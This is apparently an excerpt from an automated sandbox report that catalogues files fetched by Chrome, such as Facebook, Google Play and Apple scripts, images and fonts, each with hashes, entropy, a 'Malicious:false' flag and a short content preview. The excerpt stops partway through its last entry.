                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometDensityAwarenessContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=!1;c=a.createContext(b);g["default"]=c}),98);.__d("CometGroupsPathingFunnelLogger",[],(function(a,b,c,d,e,f){"use strict";function a(a){switch(a){case"1635855486666999":return"REACTION_MENU_LIKE";case"1678524932434102":return"REACTION_MENU_LOVE";case"478547315650144":return"REACTION_MENU_WOW";case"115940658764963":return"REACTION_MENU_HAHA";case"908563459236466":return"REACTION_MENU_SORRY";case"444813342392137":return"REACTION_MENU_ANGER";case"613557422527858":return"REACTION_MENU_SUPPORT";default:return void 0}}function b(a,b,c){return}function c(a){return}function d(a,b){return}function e(a,b,c){return}function g(a){return}f.getReactionQPLPointFromReaction=a;f.start=b;f.addPoint=c;f.addSharedPoint=d;f.addEventSharedPoint=e;f.endCancel=g}),66);.__d("CometImageFromIXValueRelayWrapper_sprite.graphql",[],(function(a,b,c,d,e,f){"use strict";a={argumentDefinitions:[
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3817)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):122923
                                                                                                                                                                                                                                  Entropy (8bit):5.472299399758699
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:KAIcfKjLatJdHL6knxNEWKeNhSMu64zsibf/GZA50frNNyhAnY/iBl6Jap+a3U2Q:PIyKoncFMqH/GZv2ap+atK8C
                                                                                                                                                                                                                                  MD5:675F3BFBA67EAF37FF1A747084B9D35D
                                                                                                                                                                                                                                  SHA1:017F8D67C92C67E480A004535800A41D2F1FE78F
                                                                                                                                                                                                                                  SHA-256:E643FAD6C7DA22675E44A57B206C5D7CC0E2528CEFAE6CB8858D128DCD98A5D8
                                                                                                                                                                                                                                  SHA-512:9C982BF214F0D338A2DD413EE35D8C2A2E8B7468BDB064F869E98415F4546EAB5CA7A50072BDB55FDA51C0D8A7132BD6046C21EE8D5165305C1BAD608C6D6E2D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:(function(){var m,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");.},t=ca(this),v=function(a,b){if(b)a:{var c=t;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}};.v("Symbol",function(a){if(a)return a;var b=function(g,f){this.$jscomp$symbol$id_=g;ba(this,"description",{configurable:!0,writable:!0,value:f})};b.prototype.toString=function(){return this.$jscomp$symbol$id_};var c="jscomp_symbol_"+(Math.random
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):196106
                                                                                                                                                                                                                                  Entropy (8bit):7.990776663094435
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:3072:aGiIUL1GIdxk50gNf21ukLKFEpxSJs0nbOJq2qG8yeD0ZykmlSyPi23cj/XYO84:/I5dx40Y21ukLJpss0bAqrfy20Zvmltu
                                                                                                                                                                                                                                  MD5:8AB645353AFE046E0A08FB2C849A620A
                                                                                                                                                                                                                                  SHA1:10AC65C1EE690A3C750389C3BBA09C25937E6D48
                                                                                                                                                                                                                                  SHA-256:31EEC9494026181C6E99DF6C72D79F085FD70CB2019E3916DB8D123BF70DE8DF
                                                                                                                                                                                                                                  SHA-512:582FE94A49CA57477B5581CD261D002615FBE5FC8857E37BAB50D5E95F0299C7526AFB6D0A429EBE0D3FE37A5322D079D73ED31F8400C1ACF9EC44B74D583D9E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../..I.MP.m;l..>......P.t......J..u..Jz..pl...x......h.(c..>...&Q.7?%..<?ivP......._.......Pv..7.O#..........H.V..!j...T...<.#..Du.f..DuNT..Y.g...oeuY~..{..Ue...6..D;..*.Z()5.e..!..W.$.....jT0...j<.*ujM...v'....2...$..!..). t...F.P..H. .......]... .^hE.h.... x.....r.+-~n..[R..<....1P..I"..V...[".*...yrEG...mS0a&...y[..;aBr%...u.X.'.....w..x.MD.fV.]..c.4..[..,.$m..*.mw...........j.L..6oL2..09[.Q...>.*V.=.l.]....W..O..7_y..*.......L".w.{>c......}O.0cw.?...0.Q.<G...F.......... ......~K.1.'..$..&>I...hT.<1t.I....0..$x]...H.9...]$.uzJ..uos^...(.Y.U....s.....G..N........V.m..G.$.N.B?.{...i...$HLb.0B.....O.[....m..cL0.....~.Z.e.&.oruEQ.#.88.....im....Kq........-=..Z.I.F...........W.'.cOeOe.'.........P....J.DI.E0.H.L...+!..R$C.$%Q..I.H.$.".Rp......@QF.SY.4_..B.'...-...7.....?.+.._....IJT..BB.......I.....A.../...A...A.^....7...t# n@.h. ...?.A.....3...C.o.Ot....=@..._.......>J....rs........0q.00..5.z.e`..%\0.......Kw..vX..p..........}...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):4286
                                                                                                                                                                                                                                  Entropy (8bit):4.639719888612948
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:EdAdhzUooooRoooT0oooooHooooooovqxoooooooooA:EkLL
                                                                                                                                                                                                                                  MD5:A217F758EFDFFF14053678DBE58FA4D0
                                                                                                                                                                                                                                  SHA1:6E0EB512C2F386D645712D7ECBE339EA85CFCA68
                                                                                                                                                                                                                                  SHA-256:F343B3015D0545A7D5B719A434135BCAE2AC766ED459AEEA671E3688B79D1875
                                                                                                                                                                                                                                  SHA-512:9BCF90FED875FFAF3170EF3425949642EB23B4E750CD42BA546D30E1A58C4FEE1A14CCDBD31455A6A442D09372CCB3873BD7477A59853608BC87660FB578119F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.gstatic.com/android/market_images/web/favicon_v3.ico
                                                                                                                                                                                                                                  Preview:...... .... .........(... ...@..... .................................................................................................................................................................5C..5C..5C.]5C.5C.5C.`5C..5C..5C..5C..5C..5C..5C..5C..5C..5C..5C..5C..=/..$l.................................................. <../A.8D..5C..5C..5C..5C..5C.:5C..5C..5C..5C..5C..5C..5C..5C..5C..5C..=/..$l..................................................TN.(?..'>..8D..5C..5C..5C..5C..5C.5C..5C..5C..5C..5C..5C..5C..5C..5C..=/..$l....................................................2..l...8..&>..8D..5C..5C..5C..5C..5C..5C.5C..5C..5C..5C..5C..5C..5C..=/..$l..................................................../... ..m...8..&>..8D..5C..5C..5C..5C..5C..5C..5C.g5C..5C..5C..5C..5C..=/..$l...................................................E...>......m...8..%>..8D..5C..5C..5C..5C..5C..5C..5C..5C.?5C..5C..5C..=/..$l...................................................B..C...>......m...8..$=..8D..5C
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):148
                                                                                                                                                                                                                                  Entropy (8bit):6.523312318185472
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:clyg1ZreK5l1GzQ9O9xbSj0hGqBBs+dK484MVYQkGAKAJlJwBNlWn:coWZaKBUdSghtBfI43M0VJlJkWn
                                                                                                                                                                                                                                  MD5:F6FCD4D43487A3BF8F47A592569FAFEB
                                                                                                                                                                                                                                  SHA1:22B1887F1C703EA9ED827A59B02AC7FCDF79CA54
                                                                                                                                                                                                                                  SHA-256:C6AEC5614A1193CCECA829712C4027C6F1B94A106395D2223229861AE110A9A4
                                                                                                                                                                                                                                  SHA-512:98ECA13BC52869440EE4319FD09AB3C076EFBD51F769052B8C85571236355E50D5426F15CFD67F4DC1942D07D72A0BF0706ACADBDFC5CD2082645CF746778443
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/mw_NfsvKM8m6RPv8Fz2GQawCOsqWv010saMnc7zbWalMxuaA9IY8h7E0VMieLxSxAFB98NFeYqbFrXXq=w48-h16-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../......j.....]@G....51..C..G.3..<...w..#.O....{.P...I).......T./]......}..1^..|.~.}.B..B%.JP..%.\..%..$..K.Y,".\../?#..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):792
                                                                                                                                                                                                                                  Entropy (8bit):5.189921816893456
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:kRZTFMTfoI/AIwiAoNoaI/AI+2ikyYxCI/AIoAnTiIdGmnYmeI/AI1iCkbRN20:kzeTJ9k0Rkym3eCn9H+Lrl
                                                                                                                                                                                                                                  MD5:2D8C88CF94F4EA146D2F6A46DC2325D6
                                                                                                                                                                                                                                  SHA1:CDFAD9BACE4AAF22AD609B7AD29B0E24F18D17A2
                                                                                                                                                                                                                                  SHA-256:5BCFF5FE1BCAE24618E4B06D541BF983F922A7EC7FCD1280A32AF5A4CEDA6426
                                                                                                                                                                                                                                  SHA-512:156B4F8559958E635519DAA3F5913B5B316242D0C5C8CDB9D71E688383BE11B00692C6126D4EA1DC4C19289B2084418E5DB0D25AFC835787DBC5BE8BF2485214
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("yNB6me");._.qr(_.NCa,class extends _.rr{constructor(a){super(a.ta)}H(){return"yNB6me"}N(){return!0}Xa(){return _.ecc}});_.$q.yNB6me=_.jcc;._.w();._.u("qqarmf");._.qr(_.yDa,class extends _.rr{constructor(a){super(a.ta)}H(){return"qqarmf"}N(){return!0}Xa(){return _.Hdc}});_.$q.qqarmf=_.Lfc;._.w();._.u("FuzVxc");._.qr(_.ADa,class extends _.rr{constructor(a){super(a.ta)}H(){return"FuzVxc"}N(){return!0}Xa(){return _.hgc}});_.$q.FuzVxc=_.kgc;._.w();._.u("I8lFqf");._.qr(_.DDa,class extends _.rr{constructor(a){super(a.ta)}H(){return"I8lFqf"}N(){return!0}Xa(){return _.ngc}});_.$q.I8lFqf=_.pgc;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (847)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):13822
                                                                                                                                                                                                                                  Entropy (8bit):5.308557467153006
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:YPNfrSf3gy1fQx56zKsvEsSDIiFtTislPchPTwFlOvHChmC82YFK:YPNzSf3g6zKIHqtpRKEuvHTC82Yg
                                                                                                                                                                                                                                  MD5:2A92CDD99A42BFCD7DAB16887539E231
                                                                                                                                                                                                                                  SHA1:310E2855E334F6F49937490D621710021B15066B
                                                                                                                                                                                                                                  SHA-256:F20C946DA61069DF3F4DC8097FB617DB50F266D25D53758D91FCCBD8341C533C
                                                                                                                                                                                                                                  SHA-512:7DBD1CA6AF6E7AA86F408C6E3D5D35AA49AD39908D8AB10AEF4CF8C806AF27889DA43D8AEDDEE030E6351DF1D81442B431C6AF206A4DF6E9BFB043892850EF49
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apps.apple.com/assets/chunk.15.097368f212a6a942763f.js
                                                                                                                                                                                                                                  Preview:/*! For license information please see chunk.15.097368f212a6a942763f.js.LICENSE.txt */.(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[15],{21015:function(e,t,n){"use strict".e.exports={canvasAvailable:n(1892),continuousScrollEventsAvailable:n(93117),cookiesAvailable:n(2022),cssLinearGradientAvailable:n(83353),cssPropertyAvailable:n(15871),cssViewportUnitsAvailable:n(77499),elementAttributeAvailable:n(13462),eventTypeAvailable:n(70683),isDesktop:n(13459),isHandheld:n(30677),isRetina:n(25152),isTablet:n(53489),localStorageAvailable:n(83574),mediaElementsAvailable:n(58093),mediaQueriesAvailable:n(28342),prefersReducedMotion:n(54719),sessionStorageAvailable:n(63160),svgAvailable:n(91676),threeDTransformsAvailable:n(78795),touchAvailable:n(50012),webGLAvailable:n(72810)}},1892:function(e,t,n){"use strict".var r=n(93796),i=n(6379),o=function(){var e=r.getDocument().createElement("canvas").return!("function"!=typeof e.getContext||!e.getContext("2d"))}.e
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 109728, version 1.0
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):109728
                                                                                                                                                                                                                                  Entropy (8bit):7.997823232989331
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:1536:7t3W6oY1OkObRhMyHpX5Rg3hEGawMCrv7m75sxECTMQ9vZE6LV9bkMReEU7KsKcr:7tG6oocR2YL23hkgfmdsZhZRlReIsQW
                                                                                                                                                                                                                                  MD5:D1883D2801247347DA20FDE4DC14631F
                                                                                                                                                                                                                                  SHA1:C26710335E7339541609B6B491C6726834C2C275
                                                                                                                                                                                                                                  SHA-256:26B85AE5213566F5E191AA4FBA212EE1DBFA010D5E31E0512A98D3699861C15B
                                                                                                                                                                                                                                  SHA-512:712391093BC4BEE069B057FA0197EAB3CD30F41317A69827F7432A601C76FEFF2D307EA8D1A61D5EAEE0667A17FBFD8F6F8BC3B0CCFA7BAB3335ECFE064ED0A3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.apple.com/wss/fonts/SF-Pro-Text/v2/sf-pro-text_semibold.woff2
                                                                                                                                                                                                                                  Preview:wOF2..............nx...=...........................,..H.`*H...>...d....6.$..$..(.. ?meta....H. 8.t[zx.A[.m;_.vqXTA}..d......h../.j.1..)Do..\A...-.t.M.B..rr..........u2.u...I...@lVH.Z......c.!WU.h.....i..w......i.....Do..p*Fe0...A...M-..E.=!......y.43..*.*..../i..Z.+m{n.].f3Sz....a.N..NF.E..|y...q...n.;jl.9...N.......XVK..S.*|.=.<..e..M.".....j.5.....?~..F.,.W......|z.W_.t|.9.!'t....M3.pH8.&...{.~....TR#....=Zt....:...~.H....p.W/j:.A.....n..G.P....:.I...G.qukm+cx..7..S.l;!=....J.?.....0.X.......27.`...)b...D...H)F...s1.e.7._....R....s7.0j.L8.+..0.......,:W.~..9"....fxR9.TgqyR...c.Xe.iQ5....o...k....._.-.3.).X../.0.(.m.?.F...).]=..|iB...jL.....j.V...@..eY.....+K.....#.....l.......?$F)T.Zbg0.\.F.z.G..../....&....@.xt....4.By...zI3.~;0..mOD..j..:..E.._.|^N.D.d,_-..cc...OdO.J....m4DHS.I.......?'v...R..hm.U.%.J.......?......J.......nfm...M{nn...9..;c.r.>w.qr...:c.si..P.Jk..Eh._.6..;..'3....i..N.d8.[.&.....VT{^..!1...$..K.=..o........#.d...|.Dy..P..E8...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):686
                                                                                                                                                                                                                                  Entropy (8bit):7.598746043153558
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:3Wgb1D5zUWvKZPlpLC4U1KZmipXyg5iLUl9KQhoMQdHtLPhW7UdvnMoO6IBHhpW:3zDWlpu4U1KRL91mHAUdv70HW
                                                                                                                                                                                                                                  MD5:7B84B8DD3AF91F4EFB81F14311422377
                                                                                                                                                                                                                                  SHA1:ACDB0366714033A533A8E3F7C7C2518F8922C9F6
                                                                                                                                                                                                                                  SHA-256:3994FA5DC726B6D4449BDE23EF495775D259E7B6086161AC379AEE60B5887A14
                                                                                                                                                                                                                                  SHA-512:168C3BA1434E4FE56BF6E421C6F98A5C4645D2BF335586FEFC76E5A2547247A97F76C4F948C79B8DC2206E06EB2B68C4FD93ADE7E224121199C79ED83A049452
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/G6jK9S77RN0laf9_6nhDo3AVxbRP9SgMmt8ZmQjKQ2hibn9xhOY-W5YFn_7stJD1CA=s64-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../?....%j..I.?..\qe...m.m..m..........E.......g.z..{..?z.8^.=s..q.&..G......0&...??.m.1gn.."2.....8..v..Wu.....H.W..,..%(..:.~Z..P....z..~O.h..u...F..X.0GB...3@..+...:...vb.5.R......-.+..S.....@.Xw.>."U..o..-.:.....j.i1...lI0p...8=....@.Xw...X.J2......&/..O..d.Y..v....x... 5.D5=J.....?..w.`O(q...`oE.B.##.}..d.s].O.j.d...5...y...3...]D...BY.7...b..FV..Uk...q\..>.X...t.j....+..D}ezP.cW..D>T3...+M...'TS.I...;..3I>.M.5.'DDf....`.......w......Wu..^4I.r.+z...T.{,m."l..d5......)._.....w..6..@.!s..7.%.$...MD....5.\....Jp..............t.b..k.........>-.7).~.....X..RP....7.b,k..Yh.I..-..l....Y...J-.Jl.U{I.[....(.{....h.BViYQ...3....
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10467)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):175637
                                                                                                                                                                                                                                  Entropy (8bit):5.543169719587562
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:4ghUaItJU64CI4gCEMcqdEc9QkLv1vQcqdI08QBVMJ6FIOKaKtYBZ:4ghUaItJU64T4gCEMcexQkLv1vQceI0h
                                                                                                                                                                                                                                  MD5:F9A32D9AA0001580F8F84862DCEB9ED2
                                                                                                                                                                                                                                  SHA1:027A1D65EA4500404BF33F155C52E592BE9267B1
                                                                                                                                                                                                                                  SHA-256:D4C628FF740F0C7D7637EDC1FE6DC8A90EC8A24A406D3C83F2E99128D624E398
                                                                                                                                                                                                                                  SHA-512:BF5312CCFE75EA7BECD7A007C0BFD06F4285D9ED29BB848DDE8C41961F24CC7E3343D5332E6AA7F2B717A58AD8F2258DBC32BE84794FB2FBBCF7882DF5F4CC27
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("APIConstants.brands",[],(function(a,b,c,d,e,f){"use strict";a="3.0";b="v"+a;c=3e3;d=750;f.GRAPH_API_VERSION=a;f.API_VERSION=b;f.DEFAULT_API_LIMIT=c;f.DEFAULT_API_ACCUMULATE_LIMIT=d}),66);.__d("SearchSourceQueryStatus",[],(function(a,b,c,d,e,f){a="ACTIVE";b="COMPLETE";f.ACTIVE=a;f.COMPLETE=b}),66);.__d("SearchSourceCallbackManager",["invariant","SearchSourceQueryStatus","createObjectFrom","nullthrows"],(function(a,b,c,d,e,f,g,h){a=function(){function a(a){this.$9=a.parseFn,typeof this.$9==="function"||h(0,4065),this.$8=a.matchFn,typeof this.$8==="function"||h(0,4066),this.$2=a.alwaysPrefixMatch||!1,this.$6=a.indexFn||i,this.$4=a.exclusions||{},this.reset()}var b=a.prototype;b.search=function(a,b){var c=this.$13(a,b);if(c)return 0;this.$1.push({queryString:a,callback:b});c=this.$1.length-1;this.$10.push(c);return c};b.$13=function(a,b){var c=this,e=this.$14(a),f=!!this.$5[a];if(!e.length){b([],a,f?d("SearchSourceQueryStatus").COMPLETE:d("SearchSourceQueryStatus").
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                  Entropy (8bit):5.2455465103298575
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvn0kaoBEOAuGNG/QVIFqhi4YVnkz+MwQRaNw6JpyxZRNlad0:kRZTFIyII/AIFMi4Ye+RkbRN20
                                                                                                                                                                                                                                  MD5:0E6E4398B7CB20BD50F0F99E2AD14A06
                                                                                                                                                                                                                                  SHA1:ADB43AA77C32BA96E36FABBA57E31032C92D215D
                                                                                                                                                                                                                                  SHA-256:09965F10B79B750B0BA131AEF45AFCDF9622CD8403453338E168CE3B15855BB8
                                                                                                                                                                                                                                  SHA-512:A826EF08113464D07BA7402C5E712095B5366A2DA9E11A2A59CA2A8B98AEA144AE1630BBE52B501DD709AF46DD87265B48FDE4EDC049637D51614C1D9EBCA2F3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("qyd4Kb");._.qr(_.PBa,class extends _.rr{constructor(a){super(a.ta)}H(){return"qyd4Kb"}N(){return!0}Xa(){return _.JMc}});_.$q.qyd4Kb=_.kA;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1566)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):41276
                                                                                                                                                                                                                                  Entropy (8bit):5.2368089739293495
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:EkxiX+skUbNIvnXh5hC+gSyJNbX+V4N8zuZYJOKLNWDjqcR5cXcpcO0cDcIvScTu:lskUbNIvnX7hC+MNhZYVNWDjRE3
                                                                                                                                                                                                                                  MD5:CF98EF659A7C40F16FB89858EE051693
                                                                                                                                                                                                                                  SHA1:F223F862E3DC2347DEC54A932E35C5BC5F794C8D
                                                                                                                                                                                                                                  SHA-256:D1DAC8F97C25357AE55BB0FF7EFAB6349022317CFBC549BB2057C15ED2DD337D
                                                                                                                                                                                                                                  SHA-512:58043EF2BA149E03964670CA8A2FB8039691129058FB95D29851F84E7D65F66270B5ECBED675D56E871D6722B959FF3AA7ED2672E1E3E89B6F071A90B120C7E4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[706],{43862:function(t){"use strict".t.exports=Object.freeze({ELEMENT:1,TEXT:3,COMMENT:8,DOCUMENT:9,DOCUMENT_TYPE:10,DOCUMENT_FRAGMENT:11})},96339:function(t,e,i){"use strict".var n=i(38694).t.exports=function(t,e){return n.insertNode(t,"insertBefore"),n.childNode(e,"insertBefore"),n.hasParentNode(e,"insertBefore"),e.parentNode.insertBefore(t,e)}},38694:function(t,e,i){"use strict".var n=i(37844),s=i(43862),r=s.COMMENT,a=s.DOCUMENT_FRAGMENT,o=s.ELEMENT,h=s.TEXT,c=[o,h,r,a],u=[o,h,r],l=[o,a].t.exports={parentNode:function(t,e,i){if(i=i||"target",t&&!n(t,l))throw new TypeError(e+": "+i+" must be an Element, or Document Fragment")},childNode:function(t,e,i){if(i=i||"target",t&&!n(t,u))throw new TypeError(e+": "+i+" must be an Element, TextNode, or Comment")},insertNode:function(t,e,i){if(i=i||"node",t&&!n(t,c))throw new TypeError(e+": "+i+" must be an Element, TextNode, Comment, or Document Fragment")},
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):28
                                                                                                                                                                                                                                  Entropy (8bit):4.2359263506290326
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:QQinPt:+Pt
                                                                                                                                                                                                                                  MD5:1505E9BB79B4C3F51AEC072BFF0E4F1D
                                                                                                                                                                                                                                  SHA1:C2229235760065DD7708E3D63A718B05FF209F37
                                                                                                                                                                                                                                  SHA-256:C3E80C02DBB99150A42F8867CFC2BD1565E9B7DE84EB4F3D75C9AF0A674566D1
                                                                                                                                                                                                                                  SHA-512:C0B996819ED4D93E5D5158867080BC16B479FD2EE651FD4F56453ABCEF6F5B5C67BB6E313D29971A61BE963BE67F4483939B89DDBB711B647453F7A0B966D47C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSFwlsWRjmpfP_yhIFDXhvEhkSBQ3OQUx6?alt=proto
                                                                                                                                                                                                                                  Preview:ChIKBw14bxIZGgAKBw3OQUx6GgA=
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (56486)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):57874
                                                                                                                                                                                                                                  Entropy (8bit):5.27812742704802
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:6QxJPpoj1J3s106OigQTl0Xh3mPv798TK/67qKMK3R3ygtQTvT:toj1JccGl0XCNgtQTL
                                                                                                                                                                                                                                  MD5:72194A5236771968F3CE2BAA7E07754F
                                                                                                                                                                                                                                  SHA1:62835C6784EB00F0A01B5235D002EB3F636746EF
                                                                                                                                                                                                                                  SHA-256:C340D2D25E2FAE8A64AF6AFD99A5D50D42EDA8C0602332345E67FE2487C612D3
                                                                                                                                                                                                                                  SHA-512:EC18040A10CD59A440A1B5DE3BB47F5D608DA48249D0E6B0E9EA5D7E6100E47601DC70DA4222F74B60DDD983DECF2BD41F1741F455490297A81D9E4EC7874927
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yL/r/2KW45SaLwT9.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/9cisb7Fe7ih/. */.__d("hoist-non-react-statics-2.5.0",[],(function(a,b,c,d,e,f){"use strict";var g={},h={exports:g};function i(){(function(b,c){typeof g==="object"&&typeof h!=="undefined"?h.exports=c():b.hoistNonReactStatics=c()})(this,function(){var a={childContextTypes:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},b={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},c=Object.defineProperty,d=Object.getOwnPropertyNames,e=Object.getOwnPropertySymbols,f=Object.getOwnPropertyDescriptor,g=Object.getPrototypeOf,h=g&&g(Object);return function i(j,k,l){if(typeof k!=="string"){if(h){var m=g(k);m&&m!==h&&i(j,m,l)}m=d(k);e&&(m=m.concat(e(k)));for(var n=0;n<m.length;++n){var o=m[n];if(!a[o]&&!b[o]&&(!l||!l[o])){var p=f(k,o);try{c(j,o,p)}catch(a){}}}return j}return j}})}var j=!1;function k(){j||(j=!0,i());return h.expor
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4009)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):29711
                                                                                                                                                                                                                                  Entropy (8bit):5.317426289518869
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:G13AcfZ02LoynipF5Og2kXGe8IcsGAGzaIlJKIV8EQFayvS+jMC1Kju:a5nipF5OSAIcsGAUdRqELZ+wAKju
                                                                                                                                                                                                                                  MD5:9F5BC0996E07E4C660060EF0BE768D39
                                                                                                                                                                                                                                  SHA1:BACF1E16033FFF53F72BE731B4AC0D1826EBDB72
